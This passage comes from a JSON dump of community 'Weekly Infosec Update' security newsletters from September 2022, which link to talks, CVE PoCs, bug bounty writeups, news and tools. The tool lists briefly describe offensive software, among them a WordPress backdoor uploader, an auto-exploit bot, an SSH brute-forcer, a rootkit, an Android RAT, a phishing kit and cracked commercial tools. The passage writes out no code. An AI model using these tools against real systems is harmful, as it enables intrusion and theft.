A few researchers claim that over 1 billion users' records as well as payment info have been compromised.\n\n   - 🔴 India's newest commercial airline, \"Akasa Air,\" has had its customers' personal data exposed, which the company attributes to a technical configuration error.\n   \n   - 🔴 The Advanced Infrastructure Hacking Workshop by NotSoSecure from the BLACKHAT 2022 event has been leaked. (Unknown source)\n   \n   - 🔴 Paid tools that have been cracked by black hat hackers: CANVAS 7.27, Invicti Standard 6.7.0.37625, Malcat malware analyzer, BurpSuite_pro_v2022_8.3, xray_1.9.1_windows_x64 and 010 Editor 13.0-beta2.\n\n - **Top 5 Infosec News:** \n\n   - 🟢 On 25th August 2022, Google announced that it is planning to launch an online cyber security training program for upgrading the skills of employees working in cyber security departments worldwide. It also announced a grant of USD 2 Million for non-profit companies to develop various cyber-safety tools for protection against several forms of cyber-attacks worldwide.\n\n   - 🟢 On 24th May 2022, IBM Corp. announced that it is planning to provide a grant of USD 5 million for the improvement of cyber security resiliency in schools all over the world. It also announced that IBM sponsor teams would help the schools to be prepared proactively against malicious cyber-attacks. This program is gradually gaining popularity across countries like the UAE, Ireland, Costa Rica, Brazil, etc.\n\n   - [🟢 United States: Here is the user manual for a mass surveillance tool that U.S. local cops are actively using.](https://www.vice.com/en/article/v7v34a/fog-reveal-local-cops-phone-location-data-manual)\n\n   - [🟢 U.S. 
Department of State Concludes Settlements of Alleged Export Violations by Ryan Adams, Marc Baier, and Daniel Gericke ](https://www.state.gov/u-s-department-of-state-concludes-settlements-of-alleged-export-violations-by-ryan-adams-marc-baier-and-daniel-gericke/) Three former NSA analysts who worked for the UAE providing exploits used for cyber surveillance.\n\n   - [🟢 Hackers hide malware in James Webb telescope images](https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/)\n  \n---\n\n### 📆📆🏛️🏛️🏛️ HIRING, COURSE & TRAINING. 📆📆📆🏛️🏛️🏛️\n\n\n**HIRING, COURSE & TRAINING - Here we talk about and share resources related to jobs, ongoing workshops and free training offered by organizations, communities and leaders.**\n\n1. Take a look at [Internship/Job Openings in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here we have collected [Interview Questions asked by organizations while hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Enrolment is open for the [FREE (ISC)² Certified in Cybersecurity](https://www.isc2.org/landing/1MCC?utm_source=isc2list&utm_medium=official-communication&utm_campaign=GBL-CC-1M-AW&utm_content=awareness) course and exam. The course is free, the candidate dues are free until September 2023 and $50 thereafter, and the exam will be charged at $50.\n\n4. A Smart Contract Auditor Shows How They [Hack Smart Contracts](https://youtu.be/xD0IZh9c8LM)\n5. Learn Memory Forensics through [CTF-styled labs - MemLabs](https://github.com/stuxnet999/MemLabs)\n \n---\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*Community members test the tools and we filter out the most in-demand and helpful tools that serve the hacker's purpose.*\n\n - **1. 
SAAS/PASS/Recon/Network/Web Pentesting** - 6\n    \n    - [DongTai IAST is an open-source passive interactive security testing (IAST) product.](https://github.com/HXSecurity/DongTai) -> It uses dynamic hooks and taint tracking algorithms to achieve universal vulnerability detection, multi-request vulnerability detection (including but not limited to missing-authorization and privilege-bypass vulnerabilities), third-party component vulnerability detection, etc. Currently, applications in Java and Python are supported for vulnerability detection.\n    \n    - [Hunt3r](https://github.com/EasyRecon/Hunt3r) - Make your bug bounty subdomain reconnaissance easier with Hunt3r, the web application reconnaissance framework.\n    \n    - [lfimap](https://github.com/hansmach1ne/lfimap) - A local file inclusion discovery and exploitation tool. \n    \n    - [Probe](https://github.com/whoami-anoint/Probe) -> A tool for bug hunters to run the automated recon process smoothly.\n  \n    - [BlackWidow](https://github.com/CoolerVoid/Vision2) - A Python-based web application spider to gather subdomains, URLs, dynamic parameters, email addresses and phone numbers from a target website. This project also includes the Inject-X fuzzer to scan dynamic URLs for common OWASP vulnerabilities.\n    \n    -  [pip-audit](https://github.com/pypa/pip-audit) -> Programmers use this tool for scanning Python environments for packages with known vulnerabilities. It uses the Python Packaging Advisory Database (https://github.com/pypa/advisory-database) via the PyPI JSON API (https://warehouse.pypa.io/api-reference/json.html) as a source of vulnerability reports.\nThis project is maintained in part by Trail of Bits with support from Google. 
This is not an official Google or Trail of Bits product.\n    \n    - [Wpushell](https://github.com/22XploiterCrew-Team/Wpushell) -> A tool used to upload a backdoor shell to a site that uses the WordPress Content Management System, with a simple, fast process and execution against more than one target. Built in Python and runnable only from the command line terminal.\n    \n      \n - **2. Cloud Security** - 1\n \n     - [CloudQuery](https://github.com/cloudquery/cloudquery)  -> The open source high performance data integration platform designed for security and infrastructure teams. CloudQuery extracts, transforms, and loads your cloud assets. CloudQuery enables you to assess, audit, and monitor the configurations of your cloud assets.\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n     \n     - [RossGeerlings/tio-ad-sync](https://github.com/RossGeerlings/tio-ad-sync) Group syncing between Active Directory and Tenable.io, and automated access control.\n     \n     - [Shreder - A powerful multi-threaded SSH protocol password brute-force tool](https://github.com/EntySec/Shreder).  -> It has gained popularity in the community for features such as very fast password guessing (one password in 0.1 second), optimization for big password lists (Shreder tries 1000 passwords in 1 minute and 40 seconds), and simple CLI and API usage.\n    \n     - [GarbageMan - A set of tools designed for .NET heap analysis. These tools offer the following benefits for malware researchers](https://github.com/WithSecureLabs/GarbageMan).\n -> *Features* that make it special: the ability to extract clear-text payloads (PE images etc.) 
from .NET heaps quickly, Easy analysis of encrypted network protocols, signs of data exfiltration, and Ability to overcome malware anti-dumping techniques (psnotify).\n\n    - [MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) -> Coerced Authentication - A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.\n \n     - [r77 Rootkit](https://github.com/bytecode77/r77-rootkit)  -> A ring 3 Rootkit that hides following entities from all processes: Files, directories, junctions, named pipes, scheduled tasks (Processes, CPU usage, Registry keys & values, Services, TCP & UDP connections\n  \n - **4. OSINT Tools** - 3\n     \n     - [The_spy_job](https://github.com/XDeadHackerX/The_spy_job) -> This Tool is focused on the OSINT of almost all areas (People, Nicknames, Social Networks, Emails, Phone Numbers, Websites, Public IPs and Images). \n     \n     - [SentryPeer(fraud detection tool) - Protect your SIP Servers from bad actors](https://github.com/SentryPeer/SentryPeer) -> It lets bad actors try to make phone calls and saves the IP address they came from and number they tried to call. Those details can then be used to raise notifications at the service providers network and the next time a user/customer tries to call a collected number, you can act anyway you see fit.\n     \n     - [fake-sms](https://github.com/machine1337/fake-sms)  -> Feature that make this tools interesting include sms anonymously, easy & super fast sms sending, international sms sending available, no charges on sending sms but we have 1 limitation as well you can send only one sms per day.                            \n  \n  - **5. 
IoT, OS & Hardware** - 4\n      \n      - [Reinschauer](https://github.com/ps1337/reinschauer) -> A PoC to remotely control *Windows machines* over Websockets.\n\n      - [SandboxBootkit](https://github.com/thesecretclub/SandboxBootkit)  -> Bootkit tested on Windows Sandbox (https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview) to patch ntoskrnl.exe and disable DSE/PatchGuard.\n\n      - [GetWindowsCredentials](https://github.com/Rvn0xsy/GetWindowsCredentials) -> Get user credentials by calling the Windows API [CredUIPromptForWindowsCredentialsW](https://github.com/Rvn0xsy/GetWindowsCredentials/blob/master/CredUIPromptForWindowsCredentialsW) and save them to a file.\n     \n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n---\n  \n### 🤝🤝🤝 How to get involved in contribution. #Contact-Us 🤝🤝🤝\n\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n    If you want to quickly get involved in making **Weekly Cybersecurity Update** better, but aren't sure how,\n    contact \"@Attr1b\" on Telegram or mail us at \"resethackerofficial@gmail.com\". \n    \n    Please write a reason: how do you plan to improve it?\n    \n### I'm so grateful to all the [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md); without their writeups, articles, findings and whitepapers, [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [organizations, groups, and communities that support us for the 
engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support, getting \"Weekly InfoSec Update\" to hackers would not have been possible.\n\n### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly by mail; I'd love to hear from you.\n\n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them.\n\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote Of Week is \"Don't rush the Process. Good Things Take Time.\"\n Here are the Agenda for *Weekly infosec Update v0.4* : **7th September - 13th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n**Tips to SAVE TIME & How to READ ?**\n- Select the topic from the *Navbar* bellow and click on **Priview** to see the Details:\n- Goto the topic > Open all relevent Title in New Tab then READ it one by one.\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIUv0 4](https://user-images.githubusercontent.com/25515871/189512256-bb51318d-3d0a-41a6-b3b9-a69cd98c2f2a.png)\n\nHuge 
thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thank you for being part of the team.\n\n<details>\n<summary><b>Priview</b></summary>\n  - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n</details>\n \n---\n\n### Let's start with the EVENT recap, and my apologies for so much info. We're finding a way to make it organized and user friendly.\n<span id=\"title-event\"></span>\n### 🎫🎫🎫 EVENT recap 🎫🎫🎫\n \nThis week Nullcon Goa 2022 (India), Ruxmon 2022 and Defcon talks were mainly trending in the infosec community, so we have collected publicly available important talks, slides, tools, weekly podcasts, YouTube videos and resources related to events, talks & webinars.\n\n<details>\n<summary><b>Priview</b></summary>\n  \n - NULLCON GOA SEP 2022\n     - [Raining CVEs on WordPress Plugin via Semgrep](https://shreyapohekar.com/blogs/raining-cves-on-wordpress-plugin-via-semgrep-nullcon-goa-2022-slide-deck/)\n     - [Alexander Popov slide - A Kernel Hacker Meets Fuchsia OS](https://a13xp0p0v.github.io/img/Alexander_Popov-Fuchsia_pwn.pdf) \n     - [s1r1us talk Electrovolt Pwning Popular Desktop Apps](https://speakerdeck.com/s1r1us/electrovolt-pwning-popular-desktop-apps-while-uncovering-new-attack-surface-on-electron?slide=2)\n     - [Talk summary by @ka3h and @covertly_overt on handling a bug bounty program](https://mobile.twitter.com/RazorpayEngg/status/1568181923704610817)\n\n- Mustafa Ankin released an honest recap of [fwd:cloudsec and AWS re:Inforce 2022](https://www.resmo.com/blog/recap-of-fwdcloudsec-and-aws-reinforce)\n\n- Ruxmon 2022 talk by PentesterLab’s Louis Nyffenegger covering [how SAML works and various attacks, including XXE, XML signature shenanigans, malicious identity providers, 
etc.](https://docs.google.com/presentation/d/1ngp3Mq8y2h2xwGKqkOhI1ePUQxvXTNO1Xhs1kaBJmqU/edit#slide=id.g14623ab8ca8_0_31)\n\n- At SF22US, Gerald Combs and Loris Degioanni introduced their project called [Logray | The Future of Packet Analysis](https://www.youtube.com/watch?v=7bfUSXJPHPs) \n\n- Some believe that hacking is about more than using a computer to manipulate a victim's computer. This video uncovers the government agencies that secretly tested [Brain Enhancement Techniques Listed In a CIA Document](https://youtu.be/zMK8bPEerEM): The report entitled Analysis and Assessment of The Gateway Process was penned in 1983 by US Army Lieutenant Colonel Wayne M McDonnell.\n  \n- Upcoming/Ongoing 𝙀𝙑𝙀𝙉𝙏𝙎: *LogRhythm RhythmWorld 2022* - Denver - 13th-15th September, THREAT CON 2022 - 13th-15th September, *SSP Alert Live Washington DC* - 19th-21st September, BSides Singapore Conference 2022 - 22nd-23rd September.\n\n</details> \n  \n---\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : PoC exploits and CVE analysis 🪲🪲🪲\n\n#### Week -> [07th September - 13th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nThere are tens of thousands of vulnerabilities disclosed each week. 
Only a handful of them will ever be exploited, so in this section, every week, we filter out [CVE PoCs and analyse the CVE writeups that have higher severity.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) Click the link to see all the mentioned PoCs, analyses and exploits.\n\n<details> \n<summary><b>Priview</b></summary>\n\n        CVE POC exploit (9+): CVE-2022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-128,\n                              CVE-2022-20360, CVE-2022-37299, CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287.\n      \n        CVE Analysis :        Latest IT security vulnerabilities patched by selected companies such as Apple, Google, Microsoft,\n                              Github, Linux (Ubuntu, Kali etc.), D-Link etc., CVE-2022-34169 & CVE-2022-31474 WordPress.\n                          \n        Exploit :             Mobile Mouse 3.6.0.4 Remote Code Execution, \n\n Note - If you don't play with CVEs then please skip this section.\n</details> \n\n<span id=\"title-bb\"></span>\n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\nHere we have 2 segments: \n1.  Hackerone/Bugcrowd reports for bug hunters.\n2.  Bug bounty writeups, tips & resources.\n\n<details> \n<summary><b>Priview</b></summary>\n \n   *1. In this segment, we have filtered out **HACKERONE/BUGCROWD REPORTS** for bug hunters:*\n \n    \n   - 🐞$33,510 - for Command Injection - Generic on Gitlab. 
@vakzz was able to execute [RCE via the DecompressedArchiveSizeValidator and Project BulkImports (behind feature flag)](https://hackerone.com/reports/1609965)\n   - 🐞$1,700 : @nokline and @bombon were able to [poison the cache of thousands of pages in Glassdoor with reflected & stored XSS](https://nokline.github.io/bugbounty/2022/09/02/Glassdoor-Cache-Poisoning.html)\n   - 🐞$1,500 - DDoS on Hyperledger: Mirko Mollik (Cre8) was able to [max out the validator nodes of the blockchain, which leads to blocking external connections, or you can ](https://hackerone.com/reports/1695472)\n\n  *2. In this segment we collected and filtered out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***   \n   \n   - 🐞Adam Bannister highlighted the [latest bug bounty programs for September 2022.](https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-september-2022)\n   - 🐞Mahmoud Youssef managed to get a [P1 through Out-of-band XXE](https://0xmahmoudjo0.medium.com/exploiting-out-of-band-xxe-in-the-wild-16fc6dad9ee2), which leads to reading all file contents, even large ones.\n   - 🐞S Rahul shared his [reconnaissance approach and how he found an SSRF](https://systemweakness.com/bug-bounty-how-i-found-an-ssrf-reconnaissance-7b1821a1b1fd)\n   - 🐞@abbasheybati1 shared a [new technique: 403 bypass on lyncdiscover.microsoft.com](https://medium.com/@abbasheybati1/403-bypass-lyncdiscover-microsoft-com-db2778458c33)\n   - 🐞In Google Chat Spaces, a bug hunter observed that the creator automatically becomes the Space Manager, and [due to an IDOR vulnerability, the bug hunter was able to remove members from any Google Chat Space](https://hopesamples.blogspot.com/2022/09/idor-leads-to-removing-members-from-any.html)\n   - 🐞In this article, Gareth Heyes shared [7 ways to call a JavaScript function without parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)\n\n  </details>  \n  \n---\n  \n<span id=\"title-research\"></span>\n### 🔍🔍🔍 
RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  This is one of our best segments for researchers, founders and organizations who want to explore security, are looking for new approaches to finding vulnerabilities, or want to keep track of the infosec market. Beginner bug hunters or junior pentesters can skip this section, or check out just the Web Security part.\n\n<details>\n<summary><b>Preview</b></summary>\n   \n - **1 - Web Security and Android security**\n\n     - [How a Script Kiddie and 25 Lines of Python Could Theoretically Devastate America’s Gas Stations](https://medium.com/@RoseSecurity/a-theoretically-devastating-cyber-attack-on-americas-gas-stations-ff1d9bbaf1)   \n     - Penetration Testing REST APIs Using Burp Suite: Part 1 – [Introduction & Configuration](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration)\n     - Sonar researchers explained how they were able to exploit a [blind server-side request forgery (SSRF) vulnerability in the WordPress pingback feature that could enable distributed denial-of-service (DDoS) attacks](https://portswigger.net/daily-swig/six-year-old-blind-ssrf-vulnerability-in-wordpress-core-feature-could-enable-ddos-attacks)\n     - Adam Bannister wrote about the WordPress project [WPHash, which harvests 75 million hashes for detecting vulnerable plugins](https://portswigger.net/daily-swig/wordpress-project-wphash-harvests-75-million-hashes-for-detecting-vulnerable-plugins)\n     - [A bug that was 23 years old or not](https://daniel.haxx.se/blog/2022/09/05/a-bug-that-was-23-years-old-or-not/)\n     - The Google Security Blog - [Fuzzing beyond memory corruption: Finding broader classes of vulnerabilities automatically.](https://security.googleblog.com/2022/09/fuzzing-beyond-memory-corruption.html)\n     - An interactive cybersecurity curriculum designed for enterprise use at software companies: [Elixir Secure Coding Training 
(ESCT)](https://github.com/Podium/elixir-secure-coding)\n\n         \n  - **2 - Cloud Security**\n     - [Automating cloud & SaaS Security for SREs](https://automatingcloudsec.substack.com/p/cloud-demands-cloud-native-security)\n     - [SREs and DevOps Teams are the defenders of the digital world](https://automatingcloudsec.substack.com/p/sres-and-devops-teams-deserve-better) \n     - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n     - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n     - [Azure Active Directory Pass-Through Authentication Flaws](https://www.secureworks.com/research/azure-active-directory-pass-through-authentication-flaws) -> In this article, Secureworks® Counter Threat Unit™ (CTU) researchers analyze how the protocols used by Pass-Through Authentication (PTA) could be exploited. \n   \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n     - The DFIR Report - [Dead or Alive? An Emotet Story](https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/)\n     - TA453 uses [Multi-Persona Impersonation (a social engineering technique) to capitalize on FOMO](https://www.proofpoint.com/us/blog/threat-insight/ta453-uses-multi-persona-impersonation-capitalize-fomo). Here the threat actor uses at least two actor-controlled personas on a single email thread to convince targets that the campaign is legitimate. 
\n     - Cybersecurity and Energy: [The Case Study of Stuxnet](https://dione.lib.unipi.gr/xmlui/bitstream/handle/unipi/14572/Zampati_men20011.pdf?sequence=1)\n     - Microsoft [investigates Iranian attacks against the Albanian government](https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/)\n\n    \n   - **Red Team**\n     - DEF CON 30 - [\"Avoiding Memory Scanners: Customizing Malware to Evade YARA, PE-sieve, and More\"](https://blog.kyleavery.com/posts/avoiding-memory-scanners/), which included the public release of a new tool called AceLdr.\n     - DEF CON 30 - [JMA: Exotic Data Exfiltration talk](https://github.com/sourcefrenchy/DEFCON-30---Exotic-Data-Exfiltration)\n     - [Part 1 :- Shellcode Injection Techniques in C#](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/) In this blog post @AhmedSher discusses process injection in C#.\n     - [Part 2 :- Shellcode Injection Techniques. Process Hollowing in C#.](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-2/)\n     - [Hijacking DLLs in Windows](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows) -> DLL hijacking is a popular technique for executing malicious payloads. 
This post lists nearly 300 executables vulnerable to relative path DLL hijacking on Windows 10 (1909), and shows how, with a few lines of VBScript, some of the DLL hijacks can be executed with elevated privileges, bypassing UAC.\n\n - **4 - Infosec Business, Funding and Market** \n\n    - Netflix’s former InfoSec leader Jason Chan offers early-stage founders six \"green flags\" to look out for [when hiring and building cybersecurity teams that truly make an impact.](https://www.bvp.com/atlas/how-to-hire-and-build-your-cybersecurity-team)\n    - Dark Reading wrote a summary of the [MarketsandMarkets(TM) report](https://www.darkreading.com/vulnerabilities-threats/penetration-testing-market-worth-2-7b-by-2027-marketsandmarkets-tm-report) that highlights a penetration testing market worth $2.7B by 2027, and more.\n    - The Security, Funded newsletter issue #60 by Return on Security shared a funding summary:\n      14 companies raised $419.2M across 12 unique product categories.\n      7 companies were acquired or had a merger event across 3 unique product categories for $1.8M.\n\n  </details>\n\n---\n  \n<span id=\"title-news\"></span>\n### 📰📰📰 NEWS 📰📰📰\n\nHere we have 3 segments:\n\n1. Twitter Threads & Tips.\n2. Data Breaches & Black Hat Hackers.\n3. 
Top 5 Infosec News.\n \n <details> \n<summary><b>Preview</b></summary>\n  \n- **TWITTER THREAD & TIPS**\n\n    - 🟢 Johan Carlsson shared a thread on [how to get started, and where and what to look for, when hunting bugs on GitLab](https://twitter.com/joaxcar/status/1567617283215720449?t=YUms7BQi4rDuIlvNFXHqGQ&s=19)\n    - 🟢 [MSSQL Coercer: Coerce a Windows SQL Server to authenticate on an arbitrary machine](https://twitter.com/podalirius_/status/1565001716080189442)\n    - 🟢 BertJanCyber shared a thread about [encoded PowerShell commands and how to hunt for suspicious PowerShell](https://twitter.com/BertJanCyber/status/1567816841644412939?t=-nvdnWTNOLtvODjtMlqo8A&s=19)\n    \n- **Leaks & Black Hat Hackers: Source Unknown**\n   \n   - 🔴 **News - Paid tools** that have been leaked or cracked by black hat hackers: Cobalt Strike 4.7 licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Malcat malware analyzer, BurpSuite_pro_v2022_9, Acunetix version 14 build 14.9.220713150 for Windows & Linux, xray_1.9.1_windows_x64 and 010 Editor 13.0-beta2.\n   \n   - 🔴 [Shiba Inu developers leaked AWS access keys in a public code repository, resulting in a compromise of their infrastructure.](https://blog.pingsafe.com/shiba-inu-cloud-credentials-leaked-in-a-major-security-breach-394ad54382c1)\n \n - **Top 5 Infosec News:** \n\n   - 🟢 **Announcement**: S0md3v released version 2.1.6 of s0md3v/Arjun.\n   - 🟢 On 24th May 2022, IBM Corp. announced that it plans to provide a grant of USD 5 million to improve cyber security resiliency in schools all over the world. It also announced that IBM sponsor teams would help the schools prepare proactively against malicious cyber attacks. The program is gradually gaining popularity across countries like the UAE, Ireland, Costa Rica, Brazil, etc.\n   - 🟢 TikTok still denies a security breach after hackers leak user data and source code. 
\n   - 🟢 Classified NATO documents stolen from Portugal, now sold on the dark web.\n   - 🟢 Hackers hide [malware in James Webb telescope images](https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/)\n\n </details> \n  \n---\n  \n<span id=\"title-hiring\"></span>\n### 🕴️🕴️🕴️ HIRING, COURSES & TRAINING 🕴️🕴️🕴️\n \nHere we talk about and share the latest resources related to jobs, workshops and free training offered by organizations, communities and leaders.\n\n<details> \n  <summary><b>Preview</b></summary>\n \n1. Take a look at [Internship/Job Openings in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here we have collected [interview questions asked by organizations while hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n </details> \n  \n---\n\n  <span id=\"title-tools\"></span>\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools and we filter out the most in-demand and helpful tools that serve the hacker's purpose.\n\n<details>\n<summary><b>Preview</b></summary>\n  \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 6\n    \n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information gathering automation tool.\n\n    - [xsser](https://github.com/epsylon/xsser) -> Cross Site \"Scripter\" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. XSSer ships with more than 1,300 XSS attack vectors and can bypass filters and exploit code on several browsers/WAFs.\n\n    - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a Swiss army knife for darkweb crawling. It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. 
It also bundles selenium to provide a fully rendered web page and a screenshot of that view.\n\n    - [Vulnerable Web App - sqli-postgres-rce-privesc-hacking-playground](https://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground)\n    \n    - [Chameleon](https://github.com/iustin24/chameleon) -> Chameleon provides better content discovery by using Wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technology. The tool is highly customizable and allows users to add their own custom wordlists, extensions or fingerprints. The [full documentation is available here](https://youst.in/posts/context-aware-conent-discovery-with-chameleon/).\n    \n    - [vMass Bot](https://github.com/c99tn/vMass) -> vMass Bot automates the exploitation of remote hosts by trying to find environment files (.env) on target hosts and extracting the info inside; the bot then detects the target host's CMS and tries to auto-exploit it and upload a shell payload using the vMass vulnerability set (108 exploits in the current version 1.2).\n  \n      \n - **2. Cloud Security** - 2\n \n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. It is intended to be used by the blue team to augment attack surface management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n     - [ContainerSSH](https://github.com/ContainerSSH/ContainerSSH) -> An SSH server that launches containers in Kubernetes and Docker\n \n - **3. 
Blue/Red Team, IR and Threat Intelligence Tools** - 7\n     \n     - [Massayo](https://github.com/thiagopeixoto/massayo) is a small proof-of-concept Rust library which removes AV/EDR hooks in a given system DLL.\n     - [Redeye](https://github.com/redeye-framework/Redeye) -> Covers many aspects of a red team engagement, whether organizing all sorts of data, creating a timeline of the engagement, and much more.\n     - [Autobloody](https://github.com/CravateRouge/autobloody) - Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.\n     - [WmiSpawn](https://github.com/daem0nc0re/TangledWinExec/tree/main/WmiSpawn) -> A PoC to investigate the WMI process execution technique. Using WMI functionality, it can spawn any process as a child process of WmiPrvSE.exe, on the local machine as well as on a remote machine.\n     - [Evilgophish - Combination of evilginx2 and GoPhish.](https://github.com/fin3ss3g0d/evilgophish)\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicts the probability of an exploit being released after a CVE is published (using a machine learning model); the project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n     - [Android RAT](https://github.com/Th30neAnd0nly/Ohm) -> A RAT built as an Android app, targeting Android users.\n  \n - **4. OSINT Tools** - 3\n     \n     - [Obsidian Ancestry Investigations](https://github.com/C3n7ral051nt4g3ncy/Obsidian)\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.  \n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines, one at a time or all at once.                  \n  \n  - **5. 
